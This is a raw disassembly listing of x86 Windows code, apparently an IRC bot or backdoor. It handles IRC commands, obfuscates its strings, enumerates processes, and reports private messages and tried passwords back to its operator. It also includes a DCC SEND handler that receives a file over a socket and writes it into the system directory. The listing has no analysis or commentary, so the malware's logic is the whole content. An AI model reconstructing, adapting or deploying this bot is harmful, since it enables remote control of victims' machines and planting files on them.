arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1114h
call sub_429A90
push ebx
push esi
lea eax, [ebp+var_C]
push edi
push eax
lea eax, [ebp+var_1114]
push 1000h
push eax
call dword_456F10
test eax, eax
jz loc_42017A
mov eax, dword_4473D8
mov ebx, [ebp+var_C]
push 3Fh
mov [ebp+var_114], eax
mov eax, dword_4473DC
pop ecx
mov [ebp+var_110], eax
push offset a??? ; "???"
push [ebp+arg_4]
xor eax, eax
lea edi, [ebp+var_10C]
rep stosd
shr ebx, 2
call dword_4370A4 ; lstrcpyA
xor edi, edi
test ebx, ebx
jbe short loc_420177
loc_4200FF: ; CODE XREF: sub_420094+B0�j
lea esi, [ebp+edi*4+var_1114]
push dword ptr [esi]
push 0
push 410h
call dword_437104 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz short loc_420141
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push 4
push ecx
push eax
call dword_456ECC
test eax, eax
jz short loc_420138
mov eax, [ebp+arg_0]
cmp eax, [esi]
jz short loc_420148
loc_420138: ; CODE XREF: sub_420094+9B�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
loc_420141: ; CODE XREF: sub_420094+86�j
inc edi
cmp edi, ebx
jb short loc_4200FF
jmp short loc_420177
; ---------------------------------------------------------------------------
loc_420148: ; CODE XREF: sub_420094+A2�j
lea eax, [ebp+var_114]
push 104h
push eax
push [ebp+var_8]
push [ebp+var_4]
call dword_456EC4
lea eax, [ebp+var_114]
push eax
push offset aS_5 ; "%s"
push [ebp+arg_4]
call sub_429A33
add esp, 0Ch
loc_420177: ; CODE XREF: sub_420094+69�j
; sub_420094+B2�j
mov eax, [ebp+arg_4]
loc_42017A: ; CODE XREF: sub_420094+28�j
pop edi
pop esi
pop ebx
leave
retn
sub_420094 endp
; =============== S U B R O U T I N E =======================================
sub_42017F proc near ; CODE XREF: sub_41F7B0+1C0�p
; .text:0043657F�j
var_4 = byte ptr -4
push ecx
push esi
mov esi, ecx
mov eax, [esi+4]
push eax
mov ecx, [eax]
lea eax, [esp+0Ch+var_4]
push ecx
push eax
mov ecx, esi
call sub_4201E5
push dword ptr [esi+4]
call sub_429006
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
pop ecx
retn
sub_42017F endp
; =============== S U B R O U T I N E =======================================
sub_4201AA proc near ; CODE XREF: sub_41FB92+1C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_4]
push edi
mov ebx, ecx
push dword ptr [esi+4]
push esi
call sub_42021D
mov [esi+4], eax
mov ecx, [eax+4]
lea edi, [eax+8]
test edi, edi
mov [ecx], eax
jz short loc_4201D4
mov esi, [esp+0Ch+arg_8]
push 61h
pop ecx
rep movsd
loc_4201D4: ; CODE XREF: sub_4201AA+1F�j
mov ecx, [esp+0Ch+arg_0]
inc dword ptr [ebx+8]
pop edi
pop esi
mov [ecx], eax
mov eax, ecx
pop ebx
retn 0Ch
sub_4201AA endp
; =============== S U B R O U T I N E =======================================
sub_4201E5 proc near ; CODE XREF: sub_42017F+12�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_4]
push edi
mov edi, ecx
jmp short loc_42020C
; ---------------------------------------------------------------------------
loc_4201EF: ; CODE XREF: sub_4201E5+2B�j
mov eax, esi
mov esi, [esi]
push eax
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
mov [ecx+4], edx
call sub_429006
dec dword ptr [edi+8]
pop ecx
loc_42020C: ; CODE XREF: sub_4201E5+8�j
cmp esi, [esp+8+arg_8]
jnz short loc_4201EF
mov eax, [esp+8+arg_0]
pop edi
mov [eax], esi
pop esi
retn 0Ch
sub_4201E5 endp
; =============== S U B R O U T I N E =======================================
sub_42021D proc near ; CODE XREF: sub_41F7B0+4F�p
; sub_4201AA+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 18Ch
call sub_42B407
pop ecx
mov ecx, [esp+arg_0]
test ecx, ecx
jnz short loc_420232
mov ecx, eax
loc_420232: ; CODE XREF: sub_42021D+11�j
mov [eax], ecx
mov ecx, [esp+arg_4]
test ecx, ecx
jnz short loc_42023E
mov ecx, eax
loc_42023E: ; CODE XREF: sub_42021D+1D�j
mov [eax+4], ecx
retn 8
sub_42021D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420244 proc near ; CODE XREF: sub_40A86F+5D�p
; sub_420399+82�p
var_154 = byte ptr -154h
var_10C = byte ptr -10Ch
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FD = byte ptr -0FDh
var_F3 = byte ptr -0F3h
var_F2 = byte ptr -0F2h
var_F1 = byte ptr -0F1h
var_EF = byte ptr -0EFh
var_EE = byte ptr -0EEh
var_EC = byte ptr -0ECh
var_E6 = byte ptr -0E6h
var_E5 = byte ptr -0E5h
var_E2 = byte ptr -0E2h
var_E1 = byte ptr -0E1h
var_DE = byte ptr -0DEh
var_DD = byte ptr -0DDh
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
xor ebx, ebx
push 100h
lea eax, [ebp+var_154]
push ebx
push eax
call sub_429690
mov esi, [ebp+arg_8]
add esp, 0Ch
cmp esi, ebx
jl short loc_4202CD
loc_42026E: ; CODE XREF: sub_420244+87�j
mov eax, [ebp+arg_4]
lea ecx, [eax+esi*4]
mov eax, [ecx]
cmp eax, ebx
jz short loc_4202CA
mov dl, [eax]
cmp dl, 2Dh
jnz short loc_4202CD
cmp [eax+2], bl
jnz short loc_420294
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_154], 1
jmp short loc_4202BC
; ---------------------------------------------------------------------------
loc_420294: ; CODE XREF: sub_420244+40�j
cmp dl, 2Dh
jnz short loc_4202CD
cmp byte ptr [eax+2], 3Ah
jnz short loc_4202CD
cmp [eax+4], bl
jnz short loc_4202CD
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_154], 1
cmp byte ptr [eax+1], 72h
jnz short loc_4202BC
mov dl, [eax+3]
mov [ebp+var_30], dl
loc_4202BC: ; CODE XREF: sub_420244+4E�j
; sub_420244+70�j
mov [eax], bl
mov eax, [ecx]
mov [eax+1], bl
mov eax, [ecx]
mov [eax+2], bl
mov [ecx], ebx
loc_4202CA: ; CODE XREF: sub_420244+34�j
dec esi
jns short loc_42026E
loc_4202CD: ; CODE XREF: sub_420244+28�j
; sub_420244+3B�j ...
movzx eax, [ebp+var_E1]
mov [ebp+var_54], eax
push 15h
movzx eax, [ebp+var_E6]
mov [ebp+var_50], eax
lea esi, [ebp+var_54]
movzx eax, [ebp+var_EC]
mov [ebp+var_4C], eax
movzx eax, [ebp+var_DE]
movzx ecx, [ebp+var_EE]
mov [ebp+var_48], eax
mov [ebp+var_40], ecx
movzx eax, [ebp+var_101]
movzx ecx, [ebp+var_E5]
movzx edx, [ebp+var_105]
mov [ebp+var_44], eax
mov [ebp+var_24], eax
movzx eax, [ebp+var_F3]
mov [ebp+var_14], eax
mov [ebp+var_3C], ecx
movzx eax, [ebp+var_F2]
movzx ecx, [ebp+var_DD]
mov [ebp+var_28], edx
mov [ebp+var_10], eax
movzx edx, [ebp+var_10C]
movzx eax, [ebp+var_F1]
mov [ebp+var_38], ecx
mov [ebp+var_20], edx
movzx ecx, [ebp+var_FD]
movzx edx, [ebp+var_106]
mov [ebp+var_C], eax
mov [ebp+var_2C], ecx
movzx eax, [ebp+var_EF]
movzx ecx, [ebp+var_E2]
mov [ebp+var_18], edx
mov [ebp+var_4], eax
movzx edx, [ebp+var_102]
mov eax, [ebp+arg_0]
mov [ebp+var_34], ecx
mov [ebp+var_8], ecx
pop ecx
mov edi, eax
mov [ebp+var_1C], edx
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_420244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420399 proc near ; DATA XREF: sub_420CC8+18�o
var_3D70 = byte ptr -3D70h
var_1660 = byte ptr -1660h
var_660 = byte ptr -660h
var_260 = byte ptr -260h
var_25C = byte ptr -25Ch
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3D70h
call sub_429A90
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
inc esi
cmp byte ptr [esi+1], 0
jz loc_4209EA
cmp byte ptr [esi], 2Bh
jnz short loc_4203DA
push offset byte_454A34
push offset asc_44DDE8 ; "+"
push esi
call sub_427931
push esi
push offset dword_443E90
call sub_41557B
add esp, 14h
loc_4203DA: ; CODE XREF: sub_420399+21�j
lea eax, [ebp+var_660]
push esi
push eax
call dword_4370A4 ; lstrcpyA
push 40h
lea eax, [ebp+var_15C]
push esi
push eax
call sub_4276B6
mov cl, [ebp+var_660]
add esp, 0Ch
cmp cl, byte_443988
mov [ebp+arg_0], eax
jnz loc_42066D
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_420244
add esp, 0Ch
cmp [ebp+var_15C], 0
mov esi, eax
lea edi, [ebp+var_5C]
push 15h
pop ecx
rep movsd
jz loc_4209EA
mov eax, [ebp+var_15C]
mov al, [eax]
cmp al, byte_443988
jnz short loc_4204AF
mov ebx, [ebp+arg_4]
mov edi, [ebp+arg_8]
inc [ebp+var_15C]
mov ecx, edi
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_41C68F
test eax, eax
mov ecx, edi
jz short loc_4204B6
call sub_41DA92
push eax
push dword ptr [ebx+0Ch]
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_420483
mov eax, [ebx]
mov [ebx+0Ch], eax
loc_420483: ; CODE XREF: sub_420399+E3�j
push 0
lea eax, [ebp+var_660]
sub esp, 54h
lea esi, [ebp+var_5C]
push 15h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push ebx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_15C]
push eax
call sub_40A938
add esp, 6Ch
loc_4204AF: ; CODE XREF: sub_420399+AF�j
; sub_420399+18B�j ...
xor eax, eax
loc_4204B1: ; CODE XREF: sub_420399+654�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4204B6: ; CODE XREF: sub_420399+D0�j
call sub_41DA92
mov esi, dword_437174
push eax
push dword ptr [ebx+0Ch]
call esi ; dword_437174
test eax, eax
jnz short loc_420515
mov ecx, edi
call sub_41C6E2
test eax, eax
lea eax, [ebp+var_660]
push eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aShktk1eNl8Jlzt ; "sHKtk1e/Nl8/jLZte1JtI/t1"
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSSSS@SSentPmS ; "%s %s %s!%s@%s (Sent PM -> \"%s\")"
loc_4204F2: ; CODE XREF: sub_420399+217�j
jz short loc_420502
push edi
call sub_41C77E
add esp, 20h
jmp loc_4209EA
; ---------------------------------------------------------------------------
loc_420502: ; CODE XREF: sub_420399:loc_4204F2�j
push offset dword_443F14
push edi
call sub_41CD84
add esp, 24h
jmp loc_4209EA
; ---------------------------------------------------------------------------
loc_420515: ; CODE XREF: sub_420399+130�j
push [ebp+var_15C]
push offset aDehziSaO0 ; "deHZI/SA//o0"
call esi ; dword_437174
test eax, eax
jnz short loc_4204AF
cmp [ebp+var_158], eax
jz loc_4209EA
push dword ptr [ebx+8]
lea eax, [ebp+var_25C]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aSS@S ; "%s!%s@%s"
push 100h
push eax
call sub_429AEE
and [ebp+arg_4], 0
add esp, 18h
cmp dword_445D04, 0
jle short loc_42058A
loc_420560: ; CODE XREF: sub_420399+1EF�j
lea eax, [ebp+var_25C]
push eax
mov eax, [ebp+arg_4]
push off_443EE0[eax*4]
call sub_427A85
pop ecx
test eax, eax
pop ecx
jnz short loc_4205B5
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
cmp eax, dword_445D04
jl short loc_420560
loc_42058A: ; CODE XREF: sub_420399+1C5�j
; sub_420399+232�j
mov ecx, edi
call sub_41C6E2
push [ebp+var_158]
test eax, eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aZcm1__num3n0oe ; "ZcM1..nUM3N0OE819.1TEYD."
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSSSS@SPassTrie ; "%s %s [%s!%s@%s] (Pass Tried -> %s)"
jmp loc_4204F2
; ---------------------------------------------------------------------------
loc_4205B5: ; CODE XREF: sub_420399+1E1�j
push [ebp+var_158]
call sub_4154E4
pop ecx
push eax
push offset dword_443E48
call esi ; dword_437174
test eax, eax
jnz short loc_42058A
push dword ptr [ebx+8]
mov ecx, edi
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_41C53A
cmp eax, 0FFFFFFFFh
mov esi, offset aSS_1 ; "%s %s"
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jnz short loc_420629
cmp [ebp+var_5C], 0
jnz short loc_42060C
cmp [ebp+var_58], 0
jnz short loc_420616
push offset aMkk0_mvscp_hwh ; "mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp"...
push edi
push esi
push dword ptr [ebx+0Ch]
push [ebp+arg_8]
call sub_41CD84
add esp, 14h
loc_42060C: ; CODE XREF: sub_420399+256�j
cmp [ebp+var_58], 0
jz loc_4209EA
loc_420616: ; CODE XREF: sub_420399+25C�j
push offset aMkk0_mvscp_hwh ; "mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp"...
push edi
push esi
push dword ptr [ebx]
push [ebp+arg_8]
call sub_41CD84
jmp short loc_420665
; ---------------------------------------------------------------------------
loc_420629: ; CODE XREF: sub_420399+250�j
cmp [ebp+var_5C], 0
jnz short loc_42064A
cmp [ebp+var_58], 0
jnz short loc_420654
push offset aQvp40nd9f2 ; "/qvP40nD9F2/"
push edi
push esi
push dword ptr [ebx+0Ch]
push [ebp+arg_8]
call sub_41CD84
add esp, 14h
loc_42064A: ; CODE XREF: sub_420399+294�j
cmp [ebp+var_58], 0
jz loc_4209EA
loc_420654: ; CODE XREF: sub_420399+29A�j
push offset aQvp40nd9f2 ; "/qvP40nD9F2/"
push edi
push esi
push dword ptr [ebx]
push [ebp+arg_8]
call sub_41CD0E
loc_420665: ; CODE XREF: sub_420399+28E�j
add esp, 14h
jmp loc_4209EA
; ---------------------------------------------------------------------------
loc_42066D: ; CODE XREF: sub_420399+70�j
mov edi, [ebp+arg_8]
mov ecx, edi
call sub_41DA92
mov esi, [ebp+arg_4]
mov ebx, dword_437174
push eax
push dword ptr [esi+0Ch]
call ebx ; dword_437174
test eax, eax
jnz loc_4209EA
push [ebp+var_15C]
push offset dword_44DD88
call ebx ; dword_437174
test eax, eax
jnz short loc_4206E9
push offset dword_4439A4
push offset dword_44DD78
push dword ptr [esi]
push edi
call sub_41CD0E
add esp, 10h
mov ecx, edi
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C68F
test eax, eax
jnz loc_4209EA
mov ecx, edi
call sub_41C6E2
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSVersionReques ; "%s Version request from: %s!%s@%s"
jmp loc_4209CD
; ---------------------------------------------------------------------------
loc_4206E9: ; CODE XREF: sub_420399+304�j
push [ebp+var_15C]
push offset dword_44DD4C
call ebx ; dword_437174
test eax, eax
jnz loc_42096A
push dword ptr [esi+8]
mov ecx, edi
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C68F
test eax, eax
jnz short loc_42072F
mov ecx, edi
call sub_41C6E2
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSDccRequestFro ; "%s DCC request from: %s!%s@%s"
jmp loc_4209CD
; ---------------------------------------------------------------------------
loc_42072F: ; CODE XREF: sub_420399+376�j
push [ebp+var_158]
push offset aSend_0 ; "SEND"
call ebx ; dword_437174
test eax, eax
jnz loc_42096A
and [ebp+arg_0], eax
lea eax, [ebp+var_260]
push 104h
push eax
call dword_4370E4 ; GetSystemDirectoryA
push [ebp+var_154]
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_260]
push offset dword_445D48
push eax
call sub_429A33
add esp, 10h
lea eax, [ebp+var_260]
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_4207AF
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSSUnableToWrit ; "%s %s unable to write file to disk."
jmp short loc_4207DF
; ---------------------------------------------------------------------------
loc_4207AF: ; CODE XREF: sub_420399+403�j
push eax
call dword_437044 ; CloseHandle
lea eax, [ebp+var_260]
push offset off_44DCFC
push eax
call sub_42A43C
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jnz short loc_4207F3
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSSOpeningFileF ; "%s %s opening file for writing."
loc_4207DF: ; CODE XREF: sub_420399+414�j
lea eax, [ebp+var_3D70]
push eax
call sub_429A33
add esp, 10h
jmp loc_420932
; ---------------------------------------------------------------------------
loc_4207F3: ; CODE XREF: sub_420399+435�j
push [ebp+var_14C]
call sub_42A030
push eax
push [ebp+var_150]
call sub_4261D4
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_4], eax
jnz short loc_42083F
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_3D70]
push offset aSSD ; "%s %s <%d>"
push eax
call sub_429A33
add esp, 14h
jmp loc_420932
; ---------------------------------------------------------------------------
loc_42083F: ; CODE XREF: sub_420399+47A�j
mov edi, 1000h
loc_420844: ; CODE XREF: sub_420399+55E�j
push edi
lea eax, [ebp+var_1660]
push 0
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp+var_1660]
push 0
push edi
push eax
push [ebp+arg_4]
call dword_456F38 ; recv
mov ebx, eax
test ebx, ebx
jz loc_4208FC
cmp ebx, 0FFFFFFFFh
jnz short loc_4208C2
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_3D70]
push offset aSSD ; "%s %s <%d>"
push eax
call sub_429A33
lea eax, [ebp+var_3D70]
push eax
push offset aS_5 ; "%s"
push [ebp+arg_8]
call sub_41C77E
push [ebp+var_4]
call sub_42A03B
add esp, 24h
push [ebp+arg_4]
call dword_456FD0 ; closesocket
loc_4208C2: ; CODE XREF: sub_420399+4DD�j
push [ebp+var_4]
lea eax, [ebp+var_1660]
push ebx
push 1
push eax
call sub_42C2E3
add [ebp+arg_0], ebx
add esp, 10h
push [ebp+arg_0]
call dword_456F14 ; ntohl
mov [ebp+var_8], eax
push 0
lea eax, [ebp+var_8]
push 4
push eax
push [ebp+arg_4]
call dword_456F6C ; send
jmp loc_420844
; ---------------------------------------------------------------------------
loc_4208FC: ; CODE XREF: sub_420399+4D4�j
mov eax, [ebp+arg_0]
cdq
push edx
push eax
call sub_427D86
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_3D70]
push [ebp+var_150]
push offset aTransferComple ; "Transfer complete from IP: %s, File: %s"...
push eax
call sub_429A33
mov edi, [ebp+arg_8]
mov ebx, dword_437174
add esp, 1Ch
loc_420932: ; CODE XREF: sub_420399+455�j
; sub_420399+4A1�j
lea eax, [ebp+var_3D70]
push eax
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSS_1 ; "%s %s"
push edi
call sub_41C77E
add esp, 10h
cmp [ebp+var_4], 0
jz short loc_42095B
push [ebp+var_4]
call sub_42A03B
pop ecx
loc_42095B: ; CODE XREF: sub_420399+5B7�j
cmp [ebp+arg_4], 0
jbe short loc_42096A
push [ebp+arg_4]
call dword_456FD0 ; closesocket
loc_42096A: ; CODE XREF: sub_420399+35F�j
; sub_420399+3A5�j ...
push [ebp+var_15C]
push offset dword_44DCA0
call ebx ; dword_437174
test eax, eax
jnz loc_4204AF
cmp [ebp+var_158], eax
jz loc_4204AF
push [ebp+var_158]
push offset dword_44DC94
push dword ptr [esi]
push edi
call sub_41CD0E
add esp, 10h
mov ecx, edi
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C68F
test eax, eax
jnz short loc_4209EA
mov ecx, edi
call sub_41C6E2
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSPingRequestFr ; "%s Ping request from: %s!%s@%s"
loc_4209CD: ; CODE XREF: sub_420399+34B�j
; sub_420399+391�j
test eax, eax
jz short loc_4209DC
push edi
call sub_41C77E
add esp, 18h
jmp short loc_4209EA
; ---------------------------------------------------------------------------
loc_4209DC: ; CODE XREF: sub_420399+636�j
push offset dword_443F14
push edi
call sub_41CD84
add esp, 1Ch
loc_4209EA: ; CODE XREF: sub_420399+18�j
; sub_420399+9B�j ...
xor eax, eax
inc eax
jmp loc_4204B1
sub_420399 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4209F2 proc near ; DATA XREF: sub_420CC8+29�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push edi
mov edi, [ebp+arg_8]
mov ecx, edi
call sub_41DA92
push eax
push [ebp+arg_0]
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_420A70
push 2
lea eax, [ebp+var_8]
push [ebp+arg_0]
push eax
call sub_4276B6
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_420A70
cmp [ebp+var_4], 0
jz short loc_420A70
push esi
mov esi, offset dword_443EF4
push esi
push [ebp+var_8]
call dword_437174 ; lstrcmpiA
test eax, eax
mov ecx, edi
jnz short loc_420A51
push offset off_443EF8
push esi
call sub_41CFD5
jmp short loc_420A59
; ---------------------------------------------------------------------------
loc_420A51: ; CODE XREF: sub_4209F2+50�j
push [ebp+var_8]
call sub_41CFAE
loc_420A59: ; CODE XREF: sub_4209F2+5D�j
mov eax, [ebp+arg_4]
push dword ptr [eax]
push offset dword_43AB8C
push [ebp+var_8]
push edi
call sub_41CD84
add esp, 10h
pop esi
loc_420A70: ; CODE XREF: sub_4209F2+1D�j
; sub_4209F2+34�j ...
xor eax, eax
pop edi
leave
retn
sub_4209F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420A75 proc near ; DATA XREF: sub_420CC8+3A�o
var_2A3C = byte ptr -2A3Ch
var_32C = byte ptr -32Ch
var_12C = dword ptr -12Ch
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2A3Ch
call sub_429A90
push esi
push edi
push 2710h
lea eax, [ebp+var_2A3C]
push [ebp+arg_0]
push eax
call sub_429C40
lea eax, [ebp+var_2A3C]
push 3
push eax
lea eax, [ebp+var_C]
push eax
call sub_4276B6
add esp, 18h
cmp [ebp+var_C], 0
jz loc_420BEA
cmp [ebp+var_8], 0
jz loc_420BEA
mov ecx, [ebp+arg_8]
call sub_41DA92
push eax
push [ebp+var_C]
call dword_437174 ; lstrcmpiA
test eax, eax
push 10h
lea eax, [ebp+var_2C]
jnz short loc_420AE1
push [ebp+var_8]
jmp short loc_420AE4
; ---------------------------------------------------------------------------
loc_420AE1: ; CODE XREF: sub_420A75+65�j
push [ebp+var_C]
loc_420AE4: ; CODE XREF: sub_420A75+6A�j
push eax
call sub_429C40
add esp, 0Ch
push 3Ah
push [ebp+arg_0]
call sub_42B0D0
mov esi, eax
pop ecx
inc esi
pop ecx
cmp byte ptr [esi], 2Bh
jnz short loc_420B46
push offset asc_44DDE8 ; "+"
push esi
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jz short loc_420B46
push esi
call sub_4292D0
cmp eax, 6
pop ecx
jbe short loc_420B46
push esi
call sub_4292D0
dec eax
push eax
push 1
push esi
call sub_4278FD
mov edi, eax
add esp, 10h
test edi, edi
jz short loc_420B46
push edi
push offset dword_443E90
call sub_41557B
pop ecx
mov esi, edi
pop ecx
loc_420B46: ; CODE XREF: sub_420A75+8A�j
; sub_420A75+9B�j ...
mov edi, offset dword_447710
push edi
push esi
call sub_429B8E
pop ecx
xor esi, esi
pop ecx
mov [ebp+var_12C], eax
inc esi
loc_420B5D: ; CODE XREF: sub_420A75+101�j
push edi
push 0
call sub_429B8E
pop ecx
mov [ebp+esi*4+var_12C], eax
test eax, eax
pop ecx
jz short loc_420B78
inc esi
cmp esi, 40h
jl short loc_420B5D
loc_420B78: ; CODE XREF: sub_420A75+FB�j
lea eax, [ebp+var_2C]
xor edi, edi
mov [ebp+var_10], eax
mov eax, offset aTopic ; "topic"
test esi, esi
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
jle short loc_420BEA
loc_420B92: ; CODE XREF: sub_420A75+173�j
mov eax, [ebp+edi*4+var_12C]
test eax, eax
jz short loc_420BE5
push eax
lea eax, [ebp+var_32C]
push offset aS_5 ; "%s"
push eax
call sub_429A33
mov al, [ebp+var_32C]
add esp, 0Ch
cmp al, byte_443988
jnz short loc_420BE5
push 1F4h
call dword_43718C ; Sleep
push 1
push 1
push [ebp+arg_8]
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_32C]
push eax
call sub_40A86F
add esp, 14h
loc_420BE5: ; CODE XREF: sub_420A75+126�j
; sub_420A75+149�j
inc edi
cmp edi, esi
jl short loc_420B92
loc_420BEA: ; CODE XREF: sub_420A75+3C�j
; sub_420A75+46�j ...
pop edi
xor eax, eax
pop esi
leave
retn
sub_420A75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420BF0 proc near ; DATA XREF: sub_420CC8+89�o
var_C4 = dword ptr -0C4h
var_8 = dword ptr -8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0C4h
push esi
lea eax, [ebp+arg_8]
push edi
mov edi, [ebp+arg_8]
xor esi, esi
push eax
lea eax, [ebp+var_C4]
push esi
push eax
push offset loc_41C372
push esi
push esi
mov [ebp+var_C4], edi
mov [ebp+var_8], esi
call dword_43717C ; CreateThread
jmp short loc_420C2C
; ---------------------------------------------------------------------------
loc_420C24: ; CODE XREF: sub_420BF0+3F�j
push 32h
call dword_43718C ; Sleep
loc_420C2C: ; CODE XREF: sub_420BF0+32�j
cmp [ebp+var_8], esi
jz short loc_420C24
mov ecx, edi
call sub_41DA92
push eax
mov ecx, edi
call sub_41CE5F
push offset byte_457F4C
mov ecx, edi
call sub_41D09D
push offset off_443EF8
push offset dword_443EF4
mov ecx, edi
call sub_41CFD5
pop edi
xor eax, eax
pop esi
leave
retn
sub_420BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420C63 proc near ; DATA XREF: sub_420CC8+78�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_4276B6
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_420CA9
cmp [ebp+var_4], 0
jz short loc_420CA9
mov esi, offset byte_457F4D
push offset byte_454A34
push esi
call dword_437174 ; lstrcmpiA
test eax, eax
jz short loc_420CA9
mov ecx, [ebp+arg_8]
push 0
push esi
push [ebp+var_4]
call sub_41D04A
loc_420CA9: ; CODE XREF: sub_420C63+1B�j
; sub_420C63+21�j ...
xor eax, eax
pop esi
leave
retn
sub_420C63 endp
; =============== S U B R O U T I N E =======================================
